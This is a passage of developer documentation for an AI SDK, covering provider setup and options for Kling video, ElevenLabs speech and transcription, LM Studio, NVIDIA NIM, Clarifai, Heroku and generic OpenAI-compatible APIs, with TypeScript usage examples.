- `voiceList` (Array<{voice_id: string}>): Voice references for voice control (Kling v3.0+). Up to 2 voices. Reference them via the `<<<voice_1>>>` template syntax in the prompt. Requires `sound: 'on'`. Cannot coexist with `elementList` on the I2V endpoint.
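As referenced above, here is a minimal sketch of the cameraControl option. It uses kling-v1-t2v, which the capability table below lists as supporting camera control in std mode; the prompt and config values are illustrative.

```ts
import { klingai, type KlingAIVideoModelOptions } from '@ai-sdk/klingai';
import { experimental_generateVideo as generateVideo } from 'ai';

const { videos } = await generateVideo({
  model: klingai.video('kling-v1-t2v'),
  prompt: 'A slow reveal of a mountain valley at dawn',
  aspectRatio: '16:9',
  duration: 5,
  providerOptions: {
    klingai: {
      mode: 'std',
      cameraControl: {
        type: 'simple',
        // All values range from -10 to 10; only zoom is non-zero here.
        config: { horizontal: 0, vertical: 0, pan: 0, tilt: 0, roll: 0, zoom: 5 },
      },
    } satisfies KlingAIVideoModelOptions,
  },
});
```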
Image-to-Video Only Options
- `imageTail` (string): End frame image for start+end frame control. Accepts an image URL or raw base64-encoded data. Requires `mode: 'pro'` for most models.
- `staticMask` (string): Static brush mask image for motion brush. Accepts an image URL or raw base64-encoded data.
- `dynamicMasks` (Array): Dynamic brush configurations for motion brush. Up to 6 groups, each with a `mask` (image URL or base64) and `trajectories` (array of `{x, y}` coordinates). A sketch appears after the Motion Control Only Options list below.
Image-to-Video and Motion Control Options
- `elementList` (Array<{element_id: number}>): Reference elements for element control (Kling v3.0+). Supports video character elements and multi-image elements. Up to 3 elements for I2V (cannot coexist with `voiceList`). Up to 1 element for motion control.
Motion Control Only Options
- `videoUrl` (string, required): URL of the reference motion video. Supports .mp4/.mov, max 100MB, duration 3-30 seconds.
- `characterOrientation` ('image' | 'video', required): Orientation of the characters in the generated video. `'image'` matches the reference image orientation (max 10s video); `'video'` matches the reference video orientation (max 30s video).
- `keepOriginalSound` ('yes' | 'no'): Whether to keep the original sound from the reference video. Defaults to `'yes'`.
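The motion brush options above can be combined as in the following sketch, which keeps a static region fixed while animating a masked region along a trajectory. It assumes kling-v1.5-i2v in pro mode (listed below as supporting motion brush); the image, mask URLs, and coordinates are placeholders.

```ts
import { klingai, type KlingAIVideoModelOptions } from '@ai-sdk/klingai';
import { experimental_generateVideo as generateVideo } from 'ai';

const { videos } = await generateVideo({
  model: klingai.video('kling-v1.5-i2v'),
  prompt: {
    image: 'https://example.com/kite-scene.png',
    text: 'The kite drifts from left to right across the sky',
  },
  providerOptions: {
    klingai: {
      mode: 'pro',
      // Areas covered by the static mask stay fixed.
      staticMask: 'https://example.com/static-mask.png',
      // Each dynamic mask group pairs a mask with a motion trajectory.
      dynamicMasks: [
        {
          mask: 'https://example.com/kite-mask.png',
          trajectories: [
            { x: 120, y: 340 },
            { x: 480, y: 210 },
          ],
        },
      ],
    } satisfies KlingAIVideoModelOptions,
  },
});
```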
Video Model Capabilities
Text-to-Video
| Model | Description |
|---|---|
| `kling-v3.0-t2v` | Latest v3.0, multi-shot, voice control, sound (3-15s) |
| `kling-v2.6-t2v` | V2.6, sound in pro mode |
| `kling-v2.5-turbo-t2v` | Optimized for speed, std and pro |
| `kling-v2.1-master-t2v` | High-quality generation, pro only |
| `kling-v2-master-t2v` | Master-quality generation |
| `kling-v1.6-t2v` | V1.6 generation, std and pro |
| `kling-v1-t2v` | Original V1 model, supports camera control (std) |
Image-to-Video
| Model | Description |
|---|---|
| `kling-v3.0-i2v` | Latest v3.0, multi-shot, element/voice control, sound (3-15s) |
| `kling-v2.6-i2v` | V2.6, sound and end-frame in pro mode |
| `kling-v2.5-turbo-i2v` | Optimized for speed, end-frame in pro |
| `kling-v2.1-master-i2v` | High-quality generation, pro only |
| `kling-v2.1-i2v` | V2.1 generation, end-frame in pro |
| `kling-v2-master-i2v` | Master-quality generation |
| `kling-v1.6-i2v` | V1.6 generation, end-frame in pro |
| `kling-v1.5-i2v` | V1.5 generation, end-frame and motion brush in pro |
| `kling-v1-i2v` | Original V1 model, end-frame and motion brush in std/pro |
Motion Control
| Model | Description |
|---|---|
| `kling-v3.0-motion-control` | Latest v3.0, enhanced facial consistency via element binding |
| `kling-v2.6-motion-control` | Transfers motion from a reference video to a character image |
---
title: ElevenLabs
description: Learn how to use the ElevenLabs provider for the AI SDK.
---
ElevenLabs Provider
The ElevenLabs provider contains support for the ElevenLabs transcription and speech generation APIs.
Setup
The ElevenLabs provider is available in the @ai-sdk/elevenlabs module. You can install it with
pnpm add @ai-sdk/elevenlabs
Provider Instance
You can import the default provider instance elevenlabs from @ai-sdk/elevenlabs:
import { elevenlabs } from '@ai-sdk/elevenlabs';
If you need a customized setup, you can import createElevenLabs from @ai-sdk/elevenlabs and create a provider instance with your settings:
import { createElevenLabs } from '@ai-sdk/elevenlabs';
const elevenlabs = createElevenLabs({
// custom settings, e.g.
fetch: customFetch,
});
You can use the following optional settings to customize the ElevenLabs provider instance:
- `apiKey` (string): API key that is being sent using the `Authorization` header. It defaults to the `ELEVENLABS_API_KEY` environment variable.
- `headers` (Record<string,string>): Custom headers to include in the requests.
- `fetch` ((input: RequestInfo, init?: RequestInit) => Promise<Response>): Custom fetch implementation. Defaults to the global `fetch` function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
Speech Models
You can create models that call the ElevenLabs speech API
using the .speech() factory method.
The first argument is the model id, e.g. eleven_multilingual_v2.
const model = elevenlabs.speech('eleven_multilingual_v2');
The voice argument can be set to a voice ID from the ElevenLabs Voice Library.
You can find voice IDs by selecting a voice in the library and copying its ID.
import { experimental_generateSpeech as generateSpeech } from 'ai';
import { elevenlabs } from '@ai-sdk/elevenlabs';
const result = await generateSpeech({
model: elevenlabs.speech('eleven_multilingual_v2'),
text: 'Hello, world!',
voice: '21m00Tcm4TlvDq8ikWAM', // Rachel voice
});
You can also pass additional provider-specific options using the providerOptions argument:
import { experimental_generateSpeech as generateSpeech } from 'ai';
import {
elevenlabs,
type ElevenLabsSpeechModelOptions,
} from '@ai-sdk/elevenlabs';
const result = await generateSpeech({
model: elevenlabs.speech('eleven_multilingual_v2'),
text: 'Hello, world!',
voice: '21m00Tcm4TlvDq8ikWAM',
providerOptions: {
elevenlabs: {
voiceSettings: {
stability: 0.5,
similarityBoost: 0.75,
},
} satisfies ElevenLabsSpeechModelOptions,
},
});
The following provider options are available:

- `languageCode` (string | null): Optional. Language code (ISO 639-1) used to enforce a language for the model. Currently, only Turbo v2.5 and Flash v2.5 support language enforcement. For other models, providing a language code will result in an error.
- `voiceSettings` (object | null): Optional. Voice settings that override stored settings for the given voice. These are applied only to the current request.
  - `stability` (double | null): Optional. Determines how stable the voice is and the randomness between each generation. Lower values introduce broader emotional range; higher values result in a more monotonous voice.
  - `similarityBoost` (double | null): Optional. Controls how closely the AI should adhere to the original voice.
  - `style` (double | null): Optional. Amplifies the style of the original speaker. May increase latency if set above 0.
  - `useSpeakerBoost` (boolean | null): Optional. Boosts similarity to the original speaker. Increases computational load and latency.
- `pronunciationDictionaryLocators` (array of objects | null): Optional. A list of pronunciation dictionary locators to apply to the text, in order. Up to 3 locators per request. Each locator object has:
  - `pronunciationDictionaryId` (string, required): The ID of the pronunciation dictionary.
  - `versionId` (string | null, optional): The version ID of the dictionary. If not provided, the latest version is used.
- `seed` (integer | null): Optional. If specified, the system will attempt to sample deterministically. Must be between 0 and 4294967295. Determinism is not guaranteed.
- `previousText` (string | null): Optional. The text that came before the current request's text. Can improve continuity when concatenating generations or influence the continuity of the current generation.
- `nextText` (string | null): Optional. The text that comes after the current request's text. Can improve continuity when concatenating generations or influence the continuity of the current generation.
- `previousRequestIds` (array of strings | null): Optional. List of request IDs for samples generated before this one. Improves continuity when splitting a large task. Max 3 IDs. If both `previousText` and `previousRequestIds` are sent, `previousText` is ignored.
- `nextRequestIds` (array of strings | null): Optional. List of request IDs for samples generated after this one. Useful for maintaining continuity when regenerating a sample. Max 3 IDs. If both `nextText` and `nextRequestIds` are sent, `nextText` is ignored.
- `applyTextNormalization` (enum): Optional. Controls text normalization. Allowed values: `'auto'` (default), `'on'`, `'off'`. `'auto'`: the system decides whether to apply normalization (e.g., spelling out numbers); `'on'`: always apply normalization; `'off'`: never apply normalization. For `eleven_turbo_v2_5` and `eleven_flash_v2_5`, normalization can only be enabled on Enterprise plans.
- `applyLanguageTextNormalization` (boolean): Optional. Defaults to `false`. Controls language text normalization, which helps with proper pronunciation in some supported languages (currently only Japanese). May significantly increase latency.
- `enableLogging` (boolean): Optional. Whether to enable request logging for this API call. Defaults to the account-level setting.
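To illustrate a few of these options together, the sketch below splits a passage into two requests and uses nextText/previousText plus a fixed seed for continuity. The voice ID matches the earlier examples; the text and seed are illustrative.

```ts
import { experimental_generateSpeech as generateSpeech } from 'ai';
import {
  elevenlabs,
  type ElevenLabsSpeechModelOptions,
} from '@ai-sdk/elevenlabs';

const part1 = 'The storm rolled in just after midnight.';
const part2 = 'By dawn, the harbor was calm again.';

// First half: tell the model what text follows it.
const first = await generateSpeech({
  model: elevenlabs.speech('eleven_multilingual_v2'),
  text: part1,
  voice: '21m00Tcm4TlvDq8ikWAM',
  providerOptions: {
    elevenlabs: {
      nextText: part2,
      seed: 12345, // best-effort determinism, not guaranteed
    } satisfies ElevenLabsSpeechModelOptions,
  },
});

// Second half: tell the model what text preceded it.
const second = await generateSpeech({
  model: elevenlabs.speech('eleven_multilingual_v2'),
  text: part2,
  voice: '21m00Tcm4TlvDq8ikWAM',
  providerOptions: {
    elevenlabs: {
      previousText: part1,
      seed: 12345,
    } satisfies ElevenLabsSpeechModelOptions,
  },
});
```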
Model Capabilities
| Model | Instructions |
|---|---|
| `eleven_v3` | |
| `eleven_multilingual_v2` | |
| `eleven_flash_v2_5` | |
| `eleven_flash_v2` | |
| `eleven_turbo_v2_5` | |
| `eleven_turbo_v2` | |
| `eleven_monolingual_v1` | |
| `eleven_multilingual_v1` | |
Transcription Models
You can create models that call the ElevenLabs transcription API
using the .transcription() factory method.
The first argument is the model id, e.g. scribe_v1.
const model = elevenlabs.transcription('scribe_v1');
You can also pass additional provider-specific options using the providerOptions argument. For example, supplying the input language in ISO-639-1 (e.g. en) format can sometimes improve transcription performance if known beforehand.
import { experimental_transcribe as transcribe } from 'ai';
import {
elevenlabs,
type ElevenLabsTranscriptionModelOptions,
} from '@ai-sdk/elevenlabs';
const result = await transcribe({
model: elevenlabs.transcription('scribe_v1'),
audio: new Uint8Array([1, 2, 3, 4]),
providerOptions: {
elevenlabs: {
languageCode: 'en',
} satisfies ElevenLabsTranscriptionModelOptions,
},
});
The following provider options are available:
- `languageCode` (string): An ISO-639-1 or ISO-639-3 language code corresponding to the language of the audio file. Can sometimes improve transcription performance if known beforehand. Defaults to `null`, in which case the language is predicted automatically.
- `tagAudioEvents` (boolean): Whether to tag audio events like (laughter), (footsteps), etc. in the transcription. Defaults to `true`.
- `numSpeakers` (integer): The maximum number of speakers talking in the uploaded file. Can help with predicting who speaks when. The maximum number of speakers that can be predicted is 32. Defaults to `null`, in which case the number of speakers is set to the maximum value the model supports.
- `timestampsGranularity` (enum): The granularity of the timestamps in the transcription. Defaults to `'word'`. Allowed values: `'none'`, `'word'`, `'character'`.
- `diarize` (boolean): Whether to annotate which speaker is currently talking in the uploaded file. Defaults to `true`.
- `fileFormat` (enum): The format of the input audio. Defaults to `'other'`. Allowed values: `'pcm_s16le_16'`, `'other'`. For `'pcm_s16le_16'`, the input audio must be 16-bit PCM at a 16kHz sample rate, single channel (mono), and little-endian byte order. Latency will be lower than with an encoded waveform.
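Putting several of these options together, a sketch for transcribing a multi-speaker recording might look like this; the file path and option values are illustrative.

```ts
import { experimental_transcribe as transcribe } from 'ai';
import {
  elevenlabs,
  type ElevenLabsTranscriptionModelOptions,
} from '@ai-sdk/elevenlabs';
import fs from 'fs';

const result = await transcribe({
  model: elevenlabs.transcription('scribe_v1'),
  audio: fs.readFileSync('./interview.mp3'),
  providerOptions: {
    elevenlabs: {
      languageCode: 'en',
      diarize: true, // annotate which speaker is talking
      numSpeakers: 2, // upper bound on expected speakers
      timestampsGranularity: 'word',
      tagAudioEvents: false, // skip (laughter), (footsteps), etc.
    } satisfies ElevenLabsTranscriptionModelOptions,
  },
});

console.log(result.text);
```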
Model Capabilities
| Model | Transcription | Duration | Segments | Language |
|---|---|---|---|---|
| `scribe_v1` | | | | |
| `scribe_v1_experimental` | | | | |
---
title: LM Studio
description: Use the LM Studio OpenAI compatible API with the AI SDK.
---
LM Studio Provider
LM Studio is a user interface for running local models.
It contains an OpenAI compatible API server that you can use with the AI SDK. You can start the local server under the Local Server tab in the LM Studio UI ("Start Server" button).
Setup
The LM Studio provider is available via the @ai-sdk/openai-compatible module as it is compatible with the OpenAI API.
You can install it with
pnpm add @ai-sdk/openai-compatible
Provider Instance
To use LM Studio, you can create a custom provider instance with the createOpenAICompatible function from @ai-sdk/openai-compatible:
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
const lmstudio = createOpenAICompatible({
name: 'lmstudio',
baseURL: 'http://localhost:1234/v1',
});
Language Models
You can interact with local LLMs in LM Studio using a provider instance.
The first argument is the model id, e.g. llama-3.2-1b.
const model = lmstudio('llama-3.2-1b');
To be able to use a model, you need to download it first.
Example
You can use LM Studio language models to generate text with the generateText function:
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { generateText } from 'ai';
const lmstudio = createOpenAICompatible({
name: 'lmstudio',
baseURL: 'http://localhost:1234/v1',
});
const { text } = await generateText({
model: lmstudio('llama-3.2-1b'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
maxRetries: 1, // immediately error if the server is not running
});
LM Studio language models can also be used with streamText.
Embedding Models
You can create models that call the LM Studio embeddings API
using the .embeddingModel() factory method.
const model = lmstudio.embeddingModel('text-embedding-nomic-embed-text-v1.5');
Example - Embedding a Single Value
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { embed } from 'ai';
const lmstudio = createOpenAICompatible({
name: 'lmstudio',
baseURL: 'http://localhost:1234/v1',
});
// 'embedding' is a single embedding object (number[])
const { embedding } = await embed({
model: lmstudio.embeddingModel('text-embedding-nomic-embed-text-v1.5'),
value: 'sunny day at the beach',
});
Example - Embedding Many Values
When loading data, e.g. when preparing a data store for retrieval-augmented generation (RAG), it is often useful to embed many values at once (batch embedding).
The AI SDK provides the embedMany function for this purpose.
Similar to embed, you can use it with embedding models,
e.g. lmstudio.embeddingModel('text-embedding-nomic-embed-text-v1.5') or lmstudio.embeddingModel('text-embedding-bge-small-en-v1.5').
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { embedMany } from 'ai';
const lmstudio = createOpenAICompatible({
name: 'lmstudio',
baseURL: 'http://localhost:1234/v1',
});
// 'embeddings' is an array of embedding objects (number[][]).
// It is sorted in the same order as the input values.
const { embeddings } = await embedMany({
model: lmstudio.embeddingModel('text-embedding-nomic-embed-text-v1.5'),
values: [
'sunny day at the beach',
'rainy afternoon in the city',
'snowy night in the mountains',
],
});
---
title: NVIDIA NIM
description: Use NVIDIA NIM OpenAI compatible API with the AI SDK.
---
NVIDIA NIM Provider
NVIDIA NIM provides optimized inference microservices for deploying foundation models. It offers an OpenAI-compatible API that you can use with the AI SDK.
Setup
The NVIDIA NIM provider is available via the @ai-sdk/openai-compatible module as it is compatible with the OpenAI API.
You can install it with:
pnpm add @ai-sdk/openai-compatible
Provider Instance
To use NVIDIA NIM, you can create a custom provider instance with the createOpenAICompatible function from @ai-sdk/openai-compatible:
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
const nim = createOpenAICompatible({
name: 'nim',
baseURL: 'https://integrate.api.nvidia.com/v1',
headers: {
Authorization: `Bearer ${process.env.NIM_API_KEY}`,
},
});
Language Models
You can interact with NIM models using a provider instance. For example, to use DeepSeek-R1, a powerful open-source language model:
const model = nim.chatModel('deepseek-ai/deepseek-r1');
Example - Generate Text
You can use NIM language models to generate text with the generateText function:
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { generateText } from 'ai';
const nim = createOpenAICompatible({
name: 'nim',
baseURL: 'https://integrate.api.nvidia.com/v1',
headers: {
Authorization: `Bearer ${process.env.NIM_API_KEY}`,
},
});
const { text, usage, finishReason } = await generateText({
model: nim.chatModel('deepseek-ai/deepseek-r1'),
prompt: 'Tell me the history of the San Francisco Mission-style burrito.',
});
console.log(text);
console.log('Token usage:', usage);
console.log('Finish reason:', finishReason);
Example - Stream Text
NIM language models can also generate text in a streaming fashion with the streamText function:
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { streamText } from 'ai';
const nim = createOpenAICompatible({
name: 'nim',
baseURL: 'https://integrate.api.nvidia.com/v1',
headers: {
Authorization: `Bearer ${process.env.NIM_API_KEY}`,
},
});
const result = streamText({
model: nim.chatModel('deepseek-ai/deepseek-r1'),
prompt: 'Tell me the history of the Northern White Rhino.',
});
for await (const textPart of result.textStream) {
process.stdout.write(textPart);
}
console.log();
console.log('Token usage:', await result.usage);
console.log('Finish reason:', await result.finishReason);
NIM language models also support structured data generation with Output.
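As a sketch of structured data generation, the example below assumes the experimental Output API from the ai package, which may differ across SDK versions; the prompt and schema are illustrative.

```ts
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { generateText, Output } from 'ai';
import { z } from 'zod';

const nim = createOpenAICompatible({
  name: 'nim',
  baseURL: 'https://integrate.api.nvidia.com/v1',
  headers: {
    Authorization: `Bearer ${process.env.NIM_API_KEY}`,
  },
});

const { experimental_output } = await generateText({
  model: nim.chatModel('deepseek-ai/deepseek-r1'),
  prompt: 'Describe the San Francisco Mission-style burrito.',
  // Constrain the result to a typed object (assumed API shape).
  experimental_output: Output.object({
    schema: z.object({
      name: z.string(),
      keyIngredients: z.array(z.string()),
      origin: z.string(),
    }),
  }),
});

console.log(experimental_output);
```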
---
title: Clarifai
description: Use Clarifai OpenAI compatible API with the AI SDK.
---
Clarifai Provider
Clarifai is a platform for building, deploying, and scaling AI-powered applications. It provides a suite of tools and APIs for computer vision, natural language processing, and generative AI. Clarifai offers an OpenAI-compatible API through its full-stack AI development platform, making it easy to integrate powerful AI capabilities using the AI SDK.
Setup
The Clarifai provider is available via the @ai-sdk/openai-compatible module as it is compatible with the OpenAI API. You can install it with:
pnpm add @ai-sdk/openai-compatible
Provider Instance
To use Clarifai, you can create a custom provider instance with the createOpenAICompatible function from @ai-sdk/openai-compatible:
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
const clarifai = createOpenAICompatible({
name: 'clarifai',
baseURL: 'https://api.clarifai.com/v2/ext/openai/v1',
apiKey: process.env.CLARIFAI_PAT,
});
New users can sign up for a free account on Clarifai to get started.
Language Models
You can interact with various large language models (LLMs) available on Clarifai using the provider instance. For example, to use DeepSeek-R1, a powerful open-source language model:
const model = clarifai.chatModel(
'https://clarifai.com/deepseek-ai/deepseek-chat/models/DeepSeek-R1-0528-Qwen3-8B',
);
Example - Generate Text
You can use Clarifai language models to generate text with the generateText function:
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { generateText } from 'ai';
const clarifai = createOpenAICompatible({
name: 'clarifai',
baseURL: 'https://api.clarifai.com/v2/ext/openai/v1',
apiKey: process.env.CLARIFAI_PAT,
});
const model = clarifai.chatModel(
'https://clarifai.com/deepseek-ai/deepseek-chat/models/DeepSeek-R1-0528-Qwen3-8B',
);
const { text, usage, finishReason } = await generateText({
model,
prompt: 'What is photosynthesis?',
});
console.log(text);
console.log('Token usage:', usage);
console.log('Finish reason:', finishReason);
Example - Streaming Text
You can also stream text responses from Clarifai models using the streamText function:
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { streamText } from 'ai';
const clarifai = createOpenAICompatible({
name: 'clarifai',
baseURL: 'https://api.clarifai.com/v2/ext/openai/v1',
apiKey: process.env.CLARIFAI_PAT,
});
const model = clarifai.chatModel(
'https://clarifai.com/deepseek-ai/deepseek-chat/models/DeepSeek-R1-0528-Qwen3-8B',
);
const result = streamText({
model,
prompt: 'What is photosynthesis?',
});
for await (const message of result.textStream) {
console.log(message);
}
For a full list of available models, refer to the Clarifai Model Gallery.
---
title: Heroku
description: Use a Heroku OpenAI compatible API with the AI SDK.
---
Heroku Provider
Heroku is a cloud platform for deploying and running applications, including AI models. Models deployed on Heroku with OpenAI API compatibility can be used with the AI SDK.
Setup
The Heroku provider is available via the @ai-sdk/openai-compatible module as it is compatible with the OpenAI API.
You can install it with
pnpm add @ai-sdk/openai-compatible
Heroku Setup
- Create a test app in Heroku:
  heroku create
- Provision inference using claude-3-5-haiku:
  heroku ai:models:create -a $APP_NAME claude-3-5-haiku
- Export the config variables:
  export INFERENCE_KEY=$(heroku config:get INFERENCE_KEY -a $APP_NAME)
  export INFERENCE_MODEL_ID=$(heroku config:get INFERENCE_MODEL_ID -a $APP_NAME)
  export INFERENCE_URL=$(heroku config:get INFERENCE_URL -a $APP_NAME)
Provider Instance
To use Heroku, you can create a custom provider instance with the createOpenAICompatible function from @ai-sdk/openai-compatible:
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
const heroku = createOpenAICompatible({
name: 'heroku',
baseURL: process.env.INFERENCE_URL + '/v1',
apiKey: process.env.INFERENCE_KEY,
});
Be sure to have your INFERENCE_KEY, INFERENCE_MODEL_ID, and INFERENCE_URL set in your environment variables.
Language Models
You can create Heroku models using a provider instance.
The first argument is the served model name, e.g. claude-3-5-haiku.
const model = heroku('claude-3-5-haiku');
Example
You can use Heroku language models to generate text with the generateText function:
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { generateText } from 'ai';
const heroku = createOpenAICompatible({
name: 'heroku',
baseURL: process.env.INFERENCE_URL + '/v1',
apiKey: process.env.INFERENCE_KEY,
});
const { text } = await generateText({
model: heroku('claude-3-5-haiku'),
prompt: 'Tell me about yourself in one sentence',
});
console.log(text);
Heroku language models are also able to generate text in a streaming fashion with the streamText function:
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { streamText } from 'ai';
const heroku = createOpenAICompatible({
name: 'heroku',
baseURL: process.env.INFERENCE_URL + '/v1',
apiKey: process.env.INFERENCE_KEY,
});
const result = streamText({
model: heroku('claude-3-5-haiku'),
prompt: 'Tell me about yourself in one sentence',
});
for await (const message of result.textStream) {
console.log(message);
}
Heroku language models also support structured data generation with Output.
---
title: OpenAI Compatible Providers
description: Use OpenAI compatible providers with the AI SDK.
---
OpenAI Compatible Providers
You can use the OpenAI Compatible Provider package with any language model provider that implements the OpenAI API.
Below we focus on the general setup and provider instance creation. You can also write a custom provider package leveraging the OpenAI Compatible package.
We provide detailed documentation for several OpenAI compatible providers, such as LM Studio, NVIDIA NIM, Clarifai, and Heroku; the general setup and provider instance creation is the same for all of them.
Setup
The OpenAI Compatible provider is available via the @ai-sdk/openai-compatible module. You can install it with:
pnpm add @ai-sdk/openai-compatible
Provider Instance
To use an OpenAI compatible provider, you can create a custom provider instance with the createOpenAICompatible function from @ai-sdk/openai-compatible:
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
const provider = createOpenAICompatible({
name: 'providerName',
apiKey: process.env.PROVIDER_API_KEY,
baseURL: 'https://api.provider.com/v1',
includeUsage: true, // Include usage information in streaming responses
});
You can use the following optional settings to customize the provider instance:
- `baseURL` (string): Set the URL prefix for API calls.
- `apiKey` (string): API key for authenticating requests. If specified, adds an `Authorization` header to request headers with the value `Bearer <apiKey>`. This will be added before any headers potentially specified in the `headers` option.
- `headers` (Record<string,string>): Optional custom headers to include in requests. These will be added to request headers after any headers potentially added by use of the `apiKey` option.
- `queryParams` (Record<string,string>): Optional custom URL query parameters to include in request URLs.
- `fetch` ((input: RequestInfo, init?: RequestInit) => Promise<Response>): Custom fetch implementation. Defaults to the global `fetch` function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
- `includeUsage` (boolean): Include usage information in streaming responses. When enabled, usage data will be included in the response metadata for streaming requests. Defaults to `undefined` (false).
- `supportsStructuredOutputs` (boolean): Set to true if the provider supports structured outputs. Only relevant for `provider()`, `provider.chatModel()`, and `provider.languageModel()`.
- `transformRequestBody` ((args: Record<string, any>) => Record<string, any>): Optional function to transform the request body before sending it to the API. This is useful for proxy providers that may require a different request format than the official OpenAI API. See the sketch after this list.
- `metadataExtractor` (MetadataExtractor): Optional metadata extractor to capture provider-specific metadata from API responses. See Custom Metadata Extraction for details.
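For instance, a proxy that expects an extra field on every request could be handled with transformRequestBody, as in this minimal sketch (the proxy URL and the route field are hypothetical):

```ts
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';

const provider = createOpenAICompatible({
  name: 'proxy-provider',
  apiKey: process.env.PROVIDER_API_KEY,
  baseURL: 'https://proxy.example.com/v1', // hypothetical proxy endpoint
  // Receives the OpenAI-style request body and returns the body to send.
  transformRequestBody: body => ({
    ...body,
    route: 'fallback-pool', // hypothetical proxy-specific field
  }),
});
```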
Language Models
You can create provider models using a provider instance.
The first argument is the model id, e.g. model-id.
const model = provider('model-id');
You can also use the following factory methods:

- `provider.languageModel('model-id')` creates a chat language model (same as `provider('model-id')`)
- `provider.chatModel('model-id')` creates a chat language model
Supported Capabilities
Chat models created with this provider support the following capabilities:
- Text generation - Generate text completions
- Streaming - Stream text responses in real-time
- Tool calling - Call tools/functions with streaming support (see the sketch below)
- Structured outputs - Generate JSON with schema validation (when `supportsStructuredOutputs` is enabled)
- Reasoning content - Support for models that return reasoning/thinking tokens (e.g., DeepSeek R1)
- System messages - Support for system prompts
- Multi-modal inputs - Support for images and other content types (provider-dependent)
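As a sketch of the tool calling capability: the model id, base URL, and weather tool below are placeholders, and the tool definition assumes the current tool/inputSchema API of the ai package.

```ts
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { generateText, tool, stepCountIs } from 'ai';
import { z } from 'zod';

const provider = createOpenAICompatible({
  name: 'providerName',
  apiKey: process.env.PROVIDER_API_KEY,
  baseURL: 'https://api.provider.com/v1',
});

const { text } = await generateText({
  model: provider('model-id'),
  prompt: 'What is the weather in Berlin?',
  tools: {
    weather: tool({
      description: 'Get the weather for a city',
      inputSchema: z.object({ city: z.string() }),
      // Stubbed result; a real tool would call a weather API here.
      execute: async ({ city }) => ({ city, temperatureCelsius: 18 }),
    }),
  },
  stopWhen: stepCountIs(3),
});

console.log(text);
```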
Example
You can use provider language models to generate text with the generateText function:
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { generateText } from 'ai';
const provider = createOpenAICompatible({
name: 'providerName',
apiKey: process.env.PROVIDER_API_KEY,
baseURL: 'https://api.provider.com/v1',
});
const { text } = await generateText({
model: provider('model-id'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
Including model ids for auto-completion
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { generateText } from 'ai';
type ExampleChatModelIds =
| 'meta-llama/Llama-3-70b-chat-hf'
| 'meta-llama/Meta-Llama-3.1-8B-Instruct-Turbo'
| (string & {});
type ExampleCompletionModelIds =
| 'codellama/CodeLlama-34b-Instruct-hf'
| 'Qwen/Qwen2.5-Coder-32B-Instruct'
| (string & {});
type ExampleEmbeddingModelIds =
| 'BAAI/bge-large-en-v1.5'
| 'bert-base-uncased'
| (string & {});
type ExampleImageModelIds = 'dall-e-3' | 'stable-diffusion-xl' | (string & {});
const model = createOpenAICompatible<
ExampleChatModelIds,
ExampleCompletionModelIds,
ExampleEmbeddingModelIds,
ExampleImageModelIds
>({
name: 'example',
apiKey: process.env.PROVIDER_API_KEY,
baseURL: 'https://api.example.com/v1',
});
// Subsequent calls to e.g. `model.chatModel` will auto-complete the model id
// from the list of `ExampleChatModelIds` while still allowing free-form
// strings as well.
const { text } = await generateText({
model: model.chatModel('meta-llama/Llama-3-70b-chat-hf'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
Custom query parameters
Some providers may require custom query parameters. An example is the Azure AI Model Inference API, which requires an api-version query parameter.
You can set these via the optional queryParams provider setting. These will be added to all requests made by the provider.
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
const provider = createOpenAICompatible({
name: 'providerName',
apiKey: process.env.PROVIDER_API_KEY,
baseURL: 'https://api.provider.com/v1',
queryParams: {
'api-version': '1.0.0',
},
});
For example, with the above configuration, API requests would include the query parameter in the URL like:
https://api.provider.com/v1/chat/completions?api-version=1.0.0.
Image Models
You can create image models using the .imageModel() factory method:
const model = provider.imageModel('model-id');
Basic Image Generation
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { generateImage } from 'ai';
const provider = createOpenAICompatible({
name: 'providerName',
apiKey: process.env.PROVIDER_API_KEY,
baseURL: 'https://api.provider.com/v1',
});
const { images } = await generateImage({
model: provider.imageModel('model-id'),
prompt: 'A futuristic cityscape at sunset',
size: '1024x1024',
});
Image Editing
The OpenAI Compatible provider supports image editing through the /images/edits endpoint. Pass input images via prompt.images to transform or edit existing images.
Basic Image Editing
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { generateImage } from 'ai';
import fs from 'fs';
const provider = createOpenAICompatible({
name: 'providerName',
apiKey: process.env.PROVIDER_API_KEY,
baseURL: 'https://api.provider.com/v1',
});
const imageBuffer = fs.readFileSync('./input-image.png');
const { images } = await generateImage({
model: provider.imageModel('model-id'),
prompt: {
text: 'Turn the cat into a dog but retain the style of the original image',
images: [imageBuffer],
},
});
Inpainting with Mask
Edit specific parts of an image using a mask:
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { generateImage } from 'ai';
import fs from 'fs';
const provider = createOpenAICompatible({
name: 'providerName',
apiKey: process.env.PROVIDER_API_KEY,
baseURL: 'https://api.provider.com/v1',
});
const image = fs.readFileSync('./input-image.png');
const mask = fs.readFileSync('./mask.png');
const { images } = await generateImage({
model: provider.imageModel('model-id'),
prompt: {
